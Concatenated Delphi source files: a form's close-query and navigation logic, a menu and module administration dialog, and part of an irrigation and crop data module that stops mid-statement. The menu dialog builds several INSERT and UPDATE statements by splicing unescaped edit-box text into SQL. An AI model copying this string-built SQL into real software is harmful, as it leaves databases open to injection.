FTraceControl.TraceIn('TParentCustomFch.FormCloseQuery'); CanClose := False; if DataSet.State in dsEditModes then begin if ModalResult = mrOk then begin if ConfigFch.ConfirmApply then if MsgBox('Apply changes?', vbQuestion + vbYesNo) = vbNo then Exit; if not ApplyChanges then Exit else CanClose := True; if FInInsertLoop then begin Append; ModalResult := mrNone; end; end else begin if ConfigFch.ConfirmCancel then if MsgBox('Cancel changes?', vbQuestion + vbYesNo) = vbNo then Exit; CancelChanges; CanClose := True; end; end else CanClose := True; FTraceControl.TraceOut; end; function TParentCustomFch.TestBeforeNavigation: Integer; var Msg: Integer; begin FTraceControl.TraceIn('TParentCustomFch.TestBeforeNavigation'); Result := 0; if dsFch.State in dsEditModes then begin Msg := MsgBox('Save changes?', vbQuestion + vbYesNoCancel); if Msg = vbYes then begin if not ApplyChanges then Exit; ActionType := atBrowse; Result := 2; end else if Msg = vbNo then begin CancelChanges; ActionType := atBrowse; Result := 1; end; end else Result := 1; FTraceControl.TraceOut; end; procedure TParentCustomFch.UpdateButtons; begin FTraceControl.TraceIn('TParentCustomFch.UpdateButtons'); btnLoop.Visible := (ActionType = atAppend); ConfigButtons(ActionType); FTraceControl.TraceOut; end; procedure TParentCustomFch.UpdateNavigation; var CanPrior, CanNext: Boolean; begin FTraceControl.TraceIn('TParentCustomFch.UpdateNavigation'); CanPrior := False; CanNext := False; if Assigned(OnCanPriorRecord) then OnCanPriorRecord(Self, CanPrior); if Assigned(OnCanNextRecord) then OnCanNextRecord(Self, CanNext); ConfigNavigation(CanPrior, CanNext); FTraceControl.TraceOut; end; procedure TParentCustomFch.RestrictForm; begin //Herdado end; function TParentCustomFch.FormRestricted: Boolean; begin Result := False; if Assigned(FDataSetControl) then begin if (Pos(Self.Name, FDataSetControl.RestrictForms) > 0) then Result := True; if not Result then Result := FDataSetControl.SoftwareExpired; end; end; end.
unit ufrmDialogAddNewMenu; interface uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, ufrmMasterDialog, ufraFooterDialog2Button, ExtCtrls, Mask, StdCtrls, uMenuManagement, DB, cxGraphics, cxLookAndFeels, cxLookAndFeelPainters, Vcl.Menus, cxControls, cxStyles, cxCustomData, cxFilter, cxData, cxDataStorage, cxEdit, cxNavigator, cxDBData, cxGridLevel, cxGridCustomTableView, cxGridTableView, cxGridDBTableView, cxClasses, cxGridCustomView, cxGrid, cxButtons, cxContainer, cxTextEdit, cxMaskEdit, cxButtonEdit, System.Actions, Vcl.ActnList, ufraFooterDialog3Button; type TfrmDialogAddNewMenu = class(TfrmMasterDialog) Panel1: TPanel; pnl1: TPanel; pnl2: TPanel; GroupBox1: TGroupBox; Label4: TLabel; Suplier: TLabel; Label2: TLabel; cboLabel: TComboBox; Label6: TLabel; edtModName: TEdit; edtActionName: TEdit; Label7: TLabel; edtModCaption: TEdit; GroupBox2: TGroupBox; lbl2: TLabel; lbl3: TLabel; Label1: TLabel; edtParentName: TEdit; edtMenuCaption: TEdit; edtMenuName: TEdit; Label8: TLabel; Label9: TLabel; GroupBox3: TGroupBox; Label3: TLabel; Label5: TLabel; GroupBox4: TGroupBox; Label10: TLabel; Label11: TLabel; lblMenuNo: TLabel; lblStatus: TLabel; btnRefresh: TcxButton; btnUpdate: TcxButton; cxGridDBTableView1: TcxGridDBTableView; cxGridLevel1: TcxGridLevel; cxGrid: TcxGrid; cxGridDBTableView1Column1: TcxGridDBColumn; cxGridDBTableView1Column2: TcxGridDBColumn; cxGridDBTableView1Column3: TcxGridDBColumn; cxGridDBTableView1Column4: TcxGridDBColumn; cxGridDBTableView1Column5: TcxGridDBColumn; cxGridDBTableView1Column6: TcxGridDBColumn; cxGridDBTableView1Column7: TcxGridDBColumn; btnSaveModule: TcxButton; btnSaveGroupModule: TcxButton; btnSaveMenu: TcxButton; cxSaveGroupMenu: TcxButton; edtModuleID: TcxButtonEdit; edtGroup_ID: TcxButtonEdit; edtModule_ID: TcxButtonEdit; edtParentID: TcxButtonEdit; edtMenuID: TcxButtonEdit; edtGroupID: TcxButtonEdit; edtMenuNo: TcxButtonEdit; edtGroupID2: TcxButtonEdit; edtMenuID2: TcxButtonEdit; procedure edtModIDKeyUp(Sender: TObject; var Key: Word; Shift: TShiftState); procedure edtModIDClickBtn(Sender: TObject); procedure FormShow(Sender: TObject); procedure btnShowClick(Sender: TObject); procedure btnSaveModuleClick(Sender: TObject); procedure btnSaveMenuClick(Sender: TObject); procedure btnSaveGroupModuleClick(Sender: TObject); procedure FormClose(Sender: TObject; var Action: TCloseAction); procedure btnRefreshClick(Sender: TObject); procedure cxSaveGroupMenuClick(Sender: TObject); procedure edtModuleIDPropertiesButtonClick(Sender: TObject; AButtonIndex: Integer); procedure edtGroup_IDPropertiesButtonClick(Sender: TObject; AButtonIndex: Integer); procedure edtModule_IDPropertiesButtonClick(Sender: TObject; AButtonIndex: Integer); procedure edtParentIDPropertiesButtonClick(Sender: TObject; AButtonIndex: Integer); procedure edtMenuIDPropertiesButtonClick(Sender: TObject; AButtonIndex: Integer); procedure edtGroupIDPropertiesButtonClick(Sender: TObject; AButtonIndex: Integer); procedure edtMenuNoPropertiesButtonClick(Sender: TObject; AButtonIndex: Integer); procedure edtGroupID2PropertiesButtonClick(Sender: TObject; AButtonIndex: Integer); procedure edtMenuID2PropertiesButtonClick(Sender: TObject; AButtonIndex: Integer); private { Private declarations } FModID : Integer; FMenuID : Integer; procedure SetData; public procedure ShowWithID(aUnitID: integer; aModID: integer = 0; aMenuID: integer = 0); { Public declarations } end; var frmDialogAddNewMenu: TfrmDialogAddNewMenu; implementation uses uRetnoUnit,DateUtils, uTSCommonDlg; {$R *.dfm} const _HeaderFlag : Integer = 100001; procedure TfrmDialogAddNewMenu.edtModIDKeyUp(Sender: TObject; var Key: Word; Shift: TShiftState); begin inherited; if not Key = VK_F5 then Exit; edtModIDClickBtn(Sender); end; procedure TfrmDialogAddNewMenu.edtModIDClickBtn(Sender: TObject); //var // sSQL2: String; // sSQL: String; begin inherited; // sSQL := 'select a.mod_id as "Module ID",' // + ' a.mod_name as "Module Name",' // + ' a.mod_caption as "Menu Caption",' // + ' a.mod_action as "Action Name"' // + ' from aut$module a'; // + IntToStr(DialogUnit); // with cLookUp('Daftar Module Aktif',sSQL,200,1) do // Begin // Try // if Strings[0] = '' then // Exit; // edtModID.Text := Strings[0]; // edtModName.Text := Strings[1]; // Finally // Free; // End; // End; // sSQL2 := 'select b.gro_id, b.gro_name as role_name,' // + ' b.gro_description as Description' // + ' from aut$user_group a' // + ' inner join aut$group b' // + ' on a.ug_gro_id=b.gro_id' // + ' where a.ug_usr_id =' // + Quot(edtUserID.Text) // + ' and a.ug_gro_unt_id = 3'; // with cOpenQuery(sSQL2) do // begin // try // edtGroupID.Text := Fields[0].AsString; // edtGroupName.Text := Fields[1].AsString; // edtketerangan.Text := Fields[2].AsString; // finally // Free; // end; // end; end; procedure TfrmDialogAddNewMenu.edtParentIDPropertiesButtonClick(Sender: TObject; AButtonIndex: Integer); var sSQL: String; begin inherited; // sSQL := 'select distinct b.menus_parent_menu_id,' // + ' a.menus_name,a.menus_caption' // + ' from aut$menu_structure a,aut$menu_structure b' // + ' where a.menus_id=b.menus_parent_menu_id'; sSQL := 'select distinct a.MENUS_ID,' + ' a.menus_name,a.menus_caption' + ' from aut$menu_structure a' + ' WHERE MENUS_UNT_ID='+ IntToStr(DialogUnit); // ,aut$menu_structure b' // + ' where a.menus_id=b.menus_parent_menu_id'; // with cLookUp('Daftar Menu Parent',sSQL,200,1) do // Begin // Try // if Strings[0] = '' then // Exit; // edtParentID.Text := Strings[0]; // edtParentName.Text := Strings[1]; // Finally // Free; // End; // End; end; procedure TfrmDialogAddNewMenu.FormShow(Sender: TObject); begin inherited; btnShowClick(Sender); end; procedure TfrmDialogAddNewMenu.btnShowClick(Sender: TObject); var sSQL: String; begin inherited; ssQL := 'select ms.menus_no as "No", ms.MENUS_ID as "Menu ID",' + ' ms.menus_parent_menu_id as "Parent ID",' + ' ms.menus_name as "Menu Name", ms.menus_caption as "Caption",' + ' ms.menus_mod_id as "Mod ID"' + ' from aut$menu m' + ' left join aut$menu_structure ms on menus_id=menu_id' + ' where menu_gro_unt_id=' + IntToStr(DialogUnit) + ' order by ms.menus_no, m.menu_id'; // cClearGrid(clgrdMenu,False); // cQueryToGrid(sSQL,clgrdMenu,True); // clgrdMenu.AutoSize := False; // clgrdMenu.AutoSizeColumns(False,12); end; procedure TfrmDialogAddNewMenu.cxSaveGroupMenuClick(Sender: TObject); var sSQL : string; begin IF FModID = 0 then begin sSQL := 'INSERT INTO AUT$MENU (MENU_ID, MENU_UNT_ID, MENU_GRO_ID,' + ' MENU_GRO_UNT_ID) VALUES ('+ TRIm(edtMenuID2.TEXT) + ', '+ IntToStr(DialogUnit) + ', '+ Trim(edtGroupID2.Text) + ', '+ IntToStr(DialogUnit) + ')'; end else begin sSQL := 'UPDATE AUT$MENU SET MENU_ID = '+ TRIm(edtMenuID2.TEXT) + ', MENU_UNT_ID = '+ IntToStr(DialogUnit) + ', MENU_GRO_ID = '+ Trim(edtGroupID2.Text) + ', MENU_GRO_UNT_ID = '+ IntToStr(DialogUnit) + ' WHERE MENU_ID = '+ IntToStr(FMenuID) + ' AND MENU_UNT_ID = '+ IntToStr(DialogUnit) // + ' AND MENU_GRO_ID = '+ IntToStr(FGroupID) + ' AND MENU_GRO_UNT_ID = '+ IntToStr(DialogUnit) end; // if (cExecSQL(sSQL,False,_HeaderFlag)) and (SimpanBlob(sSQL, _HeaderFlag)) then // Begin // cCommitTrans; // CommonDlg.ShowMessage('Berhasil simpan'); // End // else // Begin // cRollbackTrans; // CommonDlg.ShowMessage('Gagal simpan'); // End; end; procedure TfrmDialogAddNewMenu.edtModuleIDPropertiesButtonClick(Sender: TObject; AButtonIndex: Integer); var sSQL: String; begin inherited; sSQL := 'select max(MOD_ID) from AUT$MODULE'; // with cOpenQuery(sSQL) do // Begin // Try // edtModuleID.Text := IntToStr(Fields[0].AsInteger+1); // Finally // Free; // End; // End; end; procedure TfrmDialogAddNewMenu.btnSaveModuleClick(Sender: TObject); var sLabel : String; sSQL : string; begin inherited; if cboLabel.ItemIndex = 0 then sLabel := 'Add'; if cboLabel.ItemIndex = 1 then sLabel := 'Edit'; if cboLabel.ItemIndex = 2 then sLabel := 'Delete'; if cboLabel.ItemIndex = 3 then sLabel := 'Refresh'; if cboLabel.ItemIndex = 4 then sLabel := 'View'; if cboLabel.ItemIndex = 5 then sLabel := 'Posted'; Begin if FModID <> 0 then begin sSQL := 'UPDATE AUT$MODULE SET MOD_ID = '+ Trim(edtModuleID.Text) + ' , MOD_UNT_ID = '+ IntToStr(DialogUnit) + ' , MOD_NAME = '+ QuotedStr(Trim(edtModName.Text)) + ' , MOD_CAPTION = '+ QuotedStr(Trim(edtModCaption.Text)) + ' , MOD_LABEL = '+ QuotedStr(sLabel) + ' , MOD_ACTION = '+ QuotedStr(Trim(edtActionName.Text)) + ' WHERE MOD_ID = '+ IntToStr(FModID) + ' AND MOD_UNT_ID = '+ IntToStr(DialogUnit); end else begin sSQL := 'insert into AUT$MODULE (' + ' MOD_ID,' + ' MOD_UNT_ID,' + ' MOD_NAME,' + ' MOD_CAPTION,' + ' MOD_LABEL,' + ' MOD_ACTION,' + ' MOD_ICON_PATH) values (' + Trim(edtModuleID.Text) +',' + inttostr(DialogUnit) + ',' + QuotedStr(Trim(edtModName.Text)) +',' + QuotedStr(Trim(edtModCaption.Text)) +',' + QuotedStr(sLabel) +',' + QuotedStr(Trim(edtActionName.Text)) +',' + 'Null)' ; end; // if (cExecSQL(sSQL,False,_HeaderFlag)) and (SimpanBlob(sSQL, _HeaderFlag)) then // Begin // cCommitTrans; // CommonDlg.ShowMessage('Berhasil simpan module'); // end // else // Begin // cRollbackTrans; // CommonDlg.ShowMessage('Gagal simpan data'); // End; End; end; procedure TfrmDialogAddNewMenu.edtMenuIDPropertiesButtonClick(Sender: TObject; AButtonIndex: Integer); var sSQL: String; begin sSQL := 'select max(MENUS_ID) from AUT$MENU_STRUCTURE'; // with cOpenQuery(sSQL) do // Begin // Try // edtMenuID.Text := IntToStr(Fields[0].AsInteger+1); // Finally // Free; // End; // End; end; procedure TfrmDialogAddNewMenu.btnSaveMenuClick(Sender: TObject); var sSQL : String; sPrnt : Integer; begin inherited; sPrnt := 1; if (Trim(edtParentID.Text) = '') or ( Trim(edtParentID.Text)='0') then sPrnt := 0; if FModID = 0 then begin sSQL := 'insert into AUT$MENU_STRUCTURE (' + ' MENUS_ID,' + ' MENUS_UNT_ID,' + ' MENUS_NAME,' + ' MENUS_CAPTION,' + ' MENUS_MOD_ID,' + ' MENUS_MOD_UNT_ID,' + ' MENUS_PARENT_MENU_ID,' + ' MENUS_PARENT_UNT_ID,' + ' MENUS_NO)' + ' values (' + Trim(edtMenuID.Text) + ',' + IntToStr(DialogUnit) + ',' + QuotedStr(edtMenuName.Text) + ',' + QuotedStr(edtMenuCaption.Text) + ',' + Trim(edtModuleID.Text) + ',' + IntToStr(DialogUnit) + ','; if sPrnt = 0 then begin sSQL := sSQL +' null, null, '; end else begin sSQL := sSQL + QuotedStr(edtParentID.Text) + ',' + IntToStr(DialogUnit) + ','; end; sSQL := sSQL + QuotedStr(edtMenuNo.Text) + ')' ; end else begin sSQL := 'UPDATE AUT$MENU_STRUCTURE SET MENUS_ID = '+ Trim(edtMenuID.Text) + ' , MENUS_UNT_ID = '+ IntToStr(DialogUnit) + ' , MENUS_NAME = '+ QuotedStr(edtMenuName.Text) + ' , MENUS_CAPTION = '+ QuotedStr(edtMenuCaption.Text) + ' , MENUS_MOD_ID = '+ Trim(edtModuleID.Text) + ' , MENUS_MOD_UNT_ID = '+ IntToStr(DialogUnit); if sPrnt = 0 then begin sSQL := sSQL + ' , MENUS_PARENT_MENU_ID = null' + ', MENUS_PARENT_UNT_ID = null, MENUS_NO = ' + QuotedStr(edtMenuNo.Text); end else begin sSQL := sSQL + ' , MENUS_PARENT_MENU_ID = '+ QuotedStr(edtParentID.Text) + ', MENUS_PARENT_UNT_ID = ' + IntToStr(DialogUnit) + ', MENUS_NO = '+ QuotedStr(edtMenuNo.Text); end; sSQL := sSQL + ' WHERE MENUS_ID = '+ IntToStr(FMenuID) + ' AND MENUS_UNT_ID = '+ IntToStr(DialogUnit); end; // if (cExecSQL(sSQL,False,_HeaderFlag)) and (SimpanBlob(sSQL, _HeaderFlag)) then // Begin // cCommitTrans; // CommonDlg.ShowMessage('Berhasil simpan struktur menu'); // End // else // Begin // cRollbackTrans; // CommonDlg.ShowMessage('Gagal simpan data'); // End; end; procedure TfrmDialogAddNewMenu.edtGroupIDPropertiesButtonClick(Sender: TObject; AButtonIndex: Integer); //var // sSQL: String; begin // inherited; // sSQL := 'select GRO_ID,GRO_NAME,GRO_DESCRIPTION from AUT$GROUP' // + ' where GRO_UNT_ID=' // + IntToStr(DialogUnit); // with cLookUp('Selecting Group ID',sSQL,200,1) do // Begin // Try // edtGroupID.Text := Strings[0]; // Finally // Free; // End; // End; end; procedure TfrmDialogAddNewMenu.edtGroup_IDPropertiesButtonClick(Sender: TObject; AButtonIndex: Integer); var sSQL: String; begin inherited; sSQL := 'select GRO_ID,' + ' GRO_NAME,GRO_DESCRIPTION' + ' from AUT$GROUP' + ' where GRO_UNT_ID=' + IntToStr(DialogUnit); // with cLookUp('Daftar Group',sSQL,200,1) do // Begin // Try // if Strings[0] = '' then // Exit; // edtGroup_ID.Text := Strings[0]; // Finally // Free; // End; // End; end; procedure TfrmDialogAddNewMenu.btnSaveGroupModuleClick(Sender: TObject); var // intNextID: Integer; sSQL: String; begin inherited; IF FModID = 0 then begin sSQL := 'insert into AUT$GROUP_MODULE (' + ' GMOD_GRO_ID,' + ' GMOD_GRO_UNT_ID,' + ' GMOD_MOD_ID,' + ' GMOD_MOD_UNT_ID)' + ' values (' + Trim(edtGroup_ID.Text) +',' + IntToStr(DialogUnit) + ',' + Trim(edtModule_ID.Text) +',' + IntToStr(DialogUnit) +')' ; end else begin sSQL := 'UPDATE GROUP_MODULE SET GMOD_GRO_ID = '+ Trim(edtGroup_ID.Text) + ' , GMOD_GRO_UNT_ID = '+ IntToStr(DialogUnit) + ' , GMOD_MOD_ID = '+ Trim(edtModule_ID.Text) + ' , GMOD_MOD_UNT_ID = '+ IntToStr(DialogUnit) // + ' WHERE GMOD_GRO_ID = '+ IntToStr(FGroupID) + ' AND GMOD_GRO_UNT_ID = '+ IntToStr(DialogUnit) + ' AND GMOD_MOD_ID = '+ IntToStr(FModID) + ' AND GMOD_MOD_UNT_ID = '+ IntToStr(DialogUnit); end; // if (cExecSQL(sSQL,False,_HeaderFlag)) and (SimpanBlob(sSQL, _HeaderFlag)) then // Begin // cCommitTrans; // CommonDlg.ShowMessage('Berhasil simpan group - module'); // End // else // Begin // cRollbackTrans; // CommonDlg.ShowMessage('Gagal simpan data'); // End; end; procedure TfrmDialogAddNewMenu.edtModule_IDPropertiesButtonClick( Sender: TObject; AButtonIndex: Integer); var sSQL: String; begin inherited; sSQL := 'select MOD_ID,' + ' MOD_NAME,MOD_CAPTION,MOD_LABEL,MOD_ACTION' + ' from AUT$MODULE' + ' where MOD_UNT_ID=' + IntToStr(DialogUnit); // with cLookUp('Daftar Module',sSQL,200,1) do // Begin // Try // if Strings[0] = '' then // Exit; // edtModule_ID.Text := Strings[0]; // Finally // Free; // End; // End; end; procedure TfrmDialogAddNewMenu.edtGroupID2PropertiesButtonClick(Sender: TObject; AButtonIndex: Integer); var sSQL: String; begin inherited; sSQL := 'select GRO_ID,' + ' GRO_NAME,GRO_DESCRIPTION' + ' from AUT$GROUP' + ' where GRO_UNT_ID=' + IntToStr(DialogUnit); // with cLookUp('Daftar Group',sSQL,200,1) do // Begin // Try // if Strings[0] = '' then // Exit; // edtGroupID2.Text := Strings[0]; // Finally // Free; // End; // End; end; procedure TfrmDialogAddNewMenu.edtMenuID2PropertiesButtonClick(Sender: TObject; AButtonIndex: Integer); var sSQL: String; begin inherited; sSQL := 'select MENUS_ID, MENUS_NAME, MENUS_CAPTION' + ' from AUT$MENU_STRUCTURE' + ' where MENUS_UNT_ID=' + IntToStr(DialogUnit); // with cLookUp('Daftar Menu',sSQL,200,1) do // Begin // Try // if Strings[0] = '' then // Exit; // edtMenuID2.Text := Strings[0]; // Finally // Free; // End; // End; end; procedure TfrmDialogAddNewMenu.edtMenuNoPropertiesButtonClick(Sender: TObject; AButtonIndex: Integer); var sSQL: String; begin inherited; sSQL := 'select max(a.menus_no)' + ' from aut$menu_structure a' + ' where a.menus_parent_menu_id=' + QuotedStr(edtParentID.Text); // with cOpenQuery(sSQL) do // Begin // Try // edtMenuNo.Text := IntToStr(Fields[0].AsInteger+1); // Finally // Free; // End; // End; end; procedure TfrmDialogAddNewMenu.FormClose(Sender: TObject; var Action: TCloseAction); begin inherited; Action := caFree; frmDialogAddNewMenu := nil; end; procedure TfrmDialogAddNewMenu.btnRefreshClick(Sender: TObject); var sSQL: String; begin inherited; ssQL := 'select ms.menus_no as "No", ms.menus_parent_menu_id as "Parent ID",' + ' ms.menus_name as "Menu Name", ms.menus_caption as "Caption",' + ' ms.menus_mod_id as "Mod ID"' + ' from aut$menu m' + ' left join aut$menu_structure ms on menus_id=menu_id' + ' where menu_gro_unt_id='+ IntToStr(DialogUnit) + ' order by ms.menus_no, m.menu_id'; // cClearGrid(clgrdMenu,False); // cQueryToGrid(sSQL,clgrdMenu,True); // clgrdMenu.AutoSizeColumns(False,12); end; procedure TfrmDialogAddNewMenu.ShowWithID(aUnitID: integer; aModID: integer = 0; aMenuID: integer = 0); begin // FGroupID := aGroupID; DialogUnit := aUnitID; FModID := aModID; FMenuID := aMenuID; if aModID = 0 then lblStatus.Caption := 'EDIT MENU' else lblStatus.Caption := 'INSERT MENU'; SetData; Self.ShowModal; end; procedure TfrmDialogAddNewMenu.SetData; var sSQL : string; begin sSQL := 'SELECT MOD_NAME, MOD_CAPTION, MOD_LABEL, MOD_ACTION' + ' FROM AUT$MODULE' + ' WHERE MOD_ID = '+ IntToStr(FModID) + ' AND MOD_UNT_ID = '+ IntToStr(DialogUnit); // with cOpenQuery(sSQL) do // begin // try // if not Eof then // begin // edtModuleID.Text := IntToStr(FModID); // edtModName.Text := Fields[0].AsString; // edtModCaption.Text := Fields[1].AsString; // edtActionName.Text := Fields[2].AsString; // cboLabel.Text := Fields[3].AsString; // end; // finally // Free; // end; // end; sSQL := 'SELECT MENUS_NAME, MENUS_CAPTION, MENUS_PARENT_MENU_ID, MENUS_NO' + ' FROM AUT$MENU_STRUCTURE' + ' WHERE MENUS_ID = '+ IntToStr(FMenuID) + ' AND MENUS_UNT_ID = '+ IntToStr(DialogUnit); // with cOpenQuery(sSQL) do // begin // try // if not Eof then // begin // edtMenuID.Text := IntToStr(FMenuID); // edtMenuName.Text := Fields[0].AsString; // edtMenuCaption.Text := Fields[1].AsString; // edtParentID.Text := Fields[2].AsString; // edtMenuNo.Text := Fields[3].AsString; // // if (Trim(edtParentID.Text) <> '') and (Trim(edtParentID.Text) <> '0') then // begin // sSQL := 'SELECT MENUS_NAME ' // + ' FROM AUT$MENU_STRUCTURE' // + ' WHERE MENUS_ID = '+ Fields[2].AsString // + ' AND MENUS_UNT_ID = '+ IntToStr(DialogUnit); // with cOpenQuery(sSQL) do // begin // try // if not Eof then // edtParentName.Text := Fields[0].AsString; // // finally // Free; // end; // end; // end; // // end; // finally // Free; // end; // end; end; end.
unit udmDataAdmin; interface uses Forms, Windows, SysUtils, Classes, WideStrings, DbxDatasnap, DBClient, DSConnect, DB, SqlExpr, IOUtils, IPPeerClient, Data.DBXCommon, Data.DbxHTTPLayer, Data.FMTBcd, cxLocalization, Vcl.ExtCtrls, Vcl.Dialogs, cxClasses, cxGrid; type TdmData = class(TDataModule) cntConexion: TSQLConnection; dspConexion: TDSProviderConnection; cxLocalizer: TcxLocalizer; dsCiclo: TDataSource; cdsCiclo: TClientDataSet; cdsCicloID_CICLO: TStringField; cdsCicloNOMBRE: TStringField; dsSuelo: TDataSource; cdsSuelo: TClientDataSet; cdsSueloID_SUELO: TStringField; cdsSueloARCILLA: TFloatField; cdsSueloARENA: TFloatField; cdsSueloNOMBRE: TStringField; cdsSueloMO: TFloatField; cdsSueloDA: TFloatField; cdsSueloLIMO: TFloatField; dsSubsistema: TDataSource; cdsSubsistema: TClientDataSet; dsSistema: TDataSource; cdsSistema: TClientDataSet; cdsSistemaID_SISTEMA: TStringField; cdsSistemaNOMBRE: TStringField; cdsSistemadtsSubsistemas: TDataSetField; cdsSubsistemaID_SUBSISTEMA: TStringField; cdsSubsistemaNOMBRE: TStringField; cdsSubsistemaPROMEDIO: TFloatField; cdsSubsistemaMAXIMO: TFloatField; cdsSubsistemaUD: TFloatField; cdsSubsistemaID_SISTEMA: TStringField; dsEstado: TDataSource; cdsEstado: TClientDataSet; dsEstacion: TDataSource; cdsEstacion: TClientDataSet; dsFenologia: TDataSource; dsVariedad: TDataSource; cdsVariedad: TClientDataSet; dsTipo: TDataSource; cdsTipo: TClientDataSet; cdsFenologia: TClientDataSet; dsCultivo: TDataSource; cdsCultivo: TClientDataSet; cdsCultivoID_CULTIVO: TStringField; cdsCultivoNOMBRE: TStringField; cdsCultivodtsTipos: TDataSetField; cdsTipoID_TIPO: TStringField; cdsTipoORDEN: TIntegerField; cdsTipoID_SISTEMA: TStringField; cdsTipoNOMBRE: TStringField; cdsTipoTUMIN: TFloatField; cdsTipoTUMAX: TFloatField; cdsTipoKMAX: TFloatField; cdsTipoXKMAX: TFloatField; cdsTipoPRO: TFloatField; cdsTipoPRMAX: TFloatField; cdsTipoALPHA0: TFloatField; cdsTipoALPHA1: TFloatField; cdsTipoALPHA2: TFloatField; cdsTipoALPHA3: TFloatField; cdsTipoALPHA4: TFloatField; cdsTipoID_CULTIVO: TStringField; cdsTipodtsVariedades: TDataSetField; cdsTipodtsFenologias: TDataSetField; cdsVariedadID_VARIEDAD: TStringField; cdsVariedadNOMBRE: TStringField; cdsVariedadID_TIPO: TStringField; cdsFenologiaID_FENOLOGIA: TStringField; cdsFenologiaORDEN: TIntegerField; cdsFenologiaNOMBRE: TStringField; cdsFenologiaCLAVE: TStringField; cdsFenologiaDGC: TFloatField; cdsFenologiaID_TIPO: TStringField; cdsTipoKCO: TFloatField; opnDialog: TOpenDialog; dsUsuario: TDataSource; cdsUsuario: TClientDataSet; sdExcel: TSaveDialog; dsConsultaGeneral: TDataSource; cdsConsultaGeneral: TClientDataSet; cdsTipoALPHA5: TFloatField; cdsConsultaGeneralUSUSARIO: TStringField; cdsConsultaGeneralPARCELA: TStringField; cdsConsultaGeneralESTACION: TStringField; cdsConsultaGeneralSIEMBRA: TStringField; cdsConsultaGeneralFECHA: TSQLTimeStampField; cdsConsultaGeneralCULTIVO: TStringField; cdsConsultaGeneralCICLO: TStringField; cdsConsultaGeneralVARIEDAD: TStringField; cdsConsultaGeneralTIPO: TStringField; cdsConsultaGeneralINI: TSQLTimeStampField; cdsConsultaGeneralHORAS: TFloatField; cdsConsultaGeneralAVANCE: TFloatField; cdsConsultaGeneralGASTO: TFloatField; cdsConsultaGeneralLAMINA: TFloatField; cdsConsultaGeneralRENDIMIENTO: TFloatField; cdsConsultaGeneralVOLUMEN: TFloatField; cdsConsultaGeneralLAMINA_BRUTA: TFloatField; cdsConsultaGeneralEA: TFloatField; cdsConsultaGeneralProdAgua: TFloatField; cdsUsuarioID_USUARIO: TStringField; cdsUsuarioNOMBRE: TStringField; cdsUsuarioLOGIN: TStringField; cdsUsuarioPASSWORD: TStringField; cdsUsuarioACTIVO: TIntegerField; cdsConsultaGeneralUBICACION: TStringField; cdsEstadoID_ESTADO: TSmallintField; cdsEstadoNOMBRE: TStringField; cdsEstadodtsEstaciones: TDataSetField; cdsEstacionID_ESTACION: TIntegerField; cdsEstacionID_ESTADO: TSmallintField; cdsEstacionNOMBRE: TStringField; cdsEstacionACTIVO: TSmallintField; procedure AsignarEventos; procedure cdsNewRecord(DataSet: TDataSet); procedure cdsAfterPost(DataSet: TDataSet); procedure cdsReconcileError(DataSet: TCustomClientDataSet; E: EReconcileError; UpdateKind: TUpdateKind; var Action: TReconcileAction); procedure DataModuleCreate(Sender: TObject); procedure cdsSueloCalcFields(DataSet: TDataSet); procedure cdsConsultaGeneralCalcFields(DataSet: TDataSet); private { Private declarations } function GetId: String; procedure CargarDatos; procedure LoadConfig; public { Public declarations } procedure Exportar(Grid: TcxGrid); end; var dmData: TdmData; implementation {$R *.dfm} uses IniFiles, ufrmSplash, cxGridExportLink, cxGraphics, ufrmMainAdmin, Vcl.Controls; function TdmData.GetId: String; var Guid : TGuid; begin CreateGuid(Guid); Exit(GuidToString(Guid)) end; procedure TdmData.LoadConfig; var names: TStringList; i: byte; begin with TIniFile.Create('./config.ini') do try names:= TStringList.Create; cntConexion.Params.Values['HostName']:= ReadString('connection', 'host', ''); ReadSectionValues('databases', names); for i:= 0 to Pred(names.Count) do begin frmSplash.cmbName.Properties.Items.Add(names.ValueFromIndex[i]); end; frmSplash.cmbName.ItemIndex:= 0; finally Free; names.Free; end; end; procedure TdmData.AsignarEventos; var i: integer; begin for i:= 0 to Pred(ComponentCount) do begin if Components[i] is TClientDataset then begin //(Components[i] as TClientDataSet).OnNewRecord:= cdsNewRecord; (Components[i] as TClientDataSet).OnReconcileError:= cdsReconcileError; end; end; end; procedure TdmData.cdsConsultaGeneralCalcFields(DataSet: TDataSet); begin if (not cdsConsultaGeneralINI.IsNull) and (not cdsConsultaGeneralHORAS.IsNull) then begin if (not cdsConsultaGeneralGASTO.IsNull) and (not cdsConsultaGeneralAVANCE.IsNull) and (cdsConsultaGeneralAVANCE.Value > 0) then begin cdsConsultaGeneralVOLUMEN.Value:= cdsConsultaGeneralGASTO.Value * cdsConsultaGeneralHORAS.Value * 3.6; cdsConsultaGeneralLAMINA_BRUTA.Value:= cdsConsultaGeneralVOLUMEN.Value / (cdsConsultaGeneralAVANCE.Value * 100); end; end; if (cdsConsultaGeneralLAMINA_BRUTA.Value>0) then begin cdsConsultaGeneralEA.Value:= (cdsConsultaGeneralLAMINA.Value / cdsConsultaGeneralLAMINA_BRUTA.Value) * 100; end; if (cdsConsultaGeneralVOLUMEN.Value > 0) and (cdsConsultaGeneralAVANCE.Value > 0) then cdsConsultaGeneralProdAgua.Value:= cdsConsultaGeneralRENDIMIENTO.Value * 1000 / (cdsConsultaGeneralVOLUMEN.Value / cdsConsultaGeneralAVANCE.Value) else cdsConsultaGeneralProdAgua.Value:= 0; end; procedure TdmData.cdsNewRecord(DataSet: TDataSet); begin (DataSet as TClientDataSet).FieldByName( StringReplace(DataSet.Name, 'cds', 'ID_', [])).AsString := GetId; end; procedure TdmData.cdsAfterPost(DataSet: TDataSet); begin (DataSet as TClientDataSet).ApplyUpdates(0) end; procedure TdmData.cdsReconcileError(DataSet: TCustomClientDataSet; E: EReconcileError; UpdateKind: TUpdateKind; var Action: TReconcileAction); begin inherited; Application.MessageBox(PChar(E.Message),'Error',MB_OK + MB_ICONERROR); end; procedure TdmData.cdsSueloCalcFields(DataSet: TDataSet); begin if (not cdsSueloARCILLA.IsNull) and (not cdsSueloARENA.IsNull) then cdsSueloLIMO.Value:= 100 - (cdsSueloARCILLA.Value + cdsSueloARENA.Value) else cdsSueloLIMO.Value:= 0 end; procedure TdmData.DataModuleCreate(Sender: TObject); begin try frmSplash:= TfrmSplash.Create(Application); LoadConfig; frmSplash.ShowModal; frmSplash.Load:= 'Cargando idioma espaņol'; cxLocalizer.Active:= true; cxLocalizer.Locale:= 1034; AsignarEventos; cntConexion.Params.Values['ServerConnection']:= 'TsmModulo.GetConnectionData' + 